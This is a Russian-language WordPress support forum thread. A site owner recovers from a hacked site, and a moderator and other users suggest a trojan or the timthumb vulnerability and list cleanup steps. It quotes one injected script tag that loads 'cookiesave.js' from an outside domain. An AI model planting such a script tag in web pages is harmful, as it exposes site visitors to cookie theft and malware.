Модератор
Юрій
(@yube)
Похоже на трояна. Покажите содержимое файла начиная с 90-й строки.
90- ая: require_once(ABSPATH . ‘wp-settings.php’);
91- ую я удалил и вроде сайт стал открываться, теперь пытаюсь в админ. панель зайти, но сообщение следующее Parse error: syntax error, unexpected ‘<‘ in /home/p35746/www/blackeagle.ru/wp-admin/includes/template.php on line 2229
Во! Я короче везде удалил последние строчки, там был скрипт и какой- то адрес, теперь все под контролем. Всем спасибо за внимание.
Модератор
Юрій
(@yube)
теперь все под контролем
Думаете? А откуда там взялся «скрипт и какой- то адрес»?
Думаю да, в админку я зашел. Понятия не имею добавил статью, лег спать, на утро вся эта хрень. Сайт не помню
Юрий, вы были правы, сегодня опять появилась эта проблема- все тоже сообщение и вот такой скрипт там появляется <script src=»http://yourerating.com/cookiesave.js»></script>
Прошу помочь
1. Проверяетесь свежим антивирусом, скажем freedrweb.com
2. Меняете пароль от своей почты
3. Меняете пароль доступа на хостинг — в первую очередь тот, через который ходите (панель управления и фтп, например)
4. Проверяете и меняете пароли, или отключаете другие способы, какими не пользуетесь (ssh, webdav и тд) и других пользователей, если вы пользуетесь хостингом один
5. Скачиваете весь архив сайта и прогоняете антивирусом его
6. У вас написано WordPress version: 3.1.3 — обновиться надо бы. Архив из п.5 в любом случае сохраните — бекап 🙂
По крайней мере — был, тк скорее всего он увёл пароль доступа на сайт. Но возможны и другие варианты.
Модератор
Юрій
(@yube)
У меня троян, верно?
Как один из вариантов. Возможно, имеется какая-то уязвимость в Темах или в каком-то плагине. Возможно, что-то с настройкой (у Вас же, если не ошибаюсь, открытая регистрация?), скажем, у юзеров слишком много прав. Возможно взломан хостер.
Я сменил пароли и где нашел удалил скрипт
Внимание!!
Порыскал по сети, нашел последнюю, свежую информацию. Оказывается «ломают» большинство сайтов через «дырочку» в timthumb’е …
К сожалению я слишком ламер, чтобы понять)))
Разработчики timthimb’а рекомендуют заменить на свежую версию, уже исправленную.
=====
Update: Автор предлагает свой фикс для тимтамба здесь. ~Надо сравнить файлы, чем отличаются..))
=====
Возможно это к Вам и не имеет никакого отношения, сломать можно разными путями. Только вот все чаще и чаще информация приходит о взломе..